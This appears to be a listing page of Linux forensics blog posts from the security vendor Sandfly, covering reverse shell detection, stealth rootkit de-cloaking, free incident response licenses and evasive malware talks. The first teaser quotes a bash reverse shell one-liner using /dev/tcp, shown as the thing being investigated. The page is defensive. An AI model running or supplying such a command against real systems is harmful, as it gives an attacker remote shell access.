Linux Forensics
Linux Reverse Shell Detection and Forensics
In this video, we cover how to investigate one of our favorite reverse shells on Linux: bash -i >& /dev/tcp/<IP_ADDRESS>/<PORT> 0>&1 This simple command will launch a shell from the victim system to…
Sandfly 5.2 - Linux Stealth Rootkit File and Directory De-Cloaking
Sandfly 5.2 has a powerful new way to detect Linux stealth rootkits: Hidden file and directory de-cloaking. This feature will make files and directories hidden by many types of stealth rootkits…
Free Sandfly Linux Incident Response License
Sandfly is offering free licenses for incident response teams. Sandfly's agentless deployment on Linux makes it compatible, fast, and safe giving it unparalleled capability for incident response. Our…
Detecting Linux Stealth Rootkits with Directory Link Errors
Detecting stealth rootkits on Linux can be done from the command line. The secret is to ask the same question multiple ways to make sure all answers agree. If they don't all agree, something is…
Evasive Linux Malware Detection Video Presentation (BPFDoor)
Sandfly founder Craig Rowland recently spoke at the Oslo Cold Incident Response Conference on evasive Linux malware. Although talks were not recorded, he made a video of the presentation he gave…
Detecting Evasive Linux Malware Presentation
Sandfly founder Craig Rowland gave a presentation for the FIRST Cold Incident Response Conference in Oslo on evasive Linux backdoors and malware below: Evasive Linux Backdoors and Malware…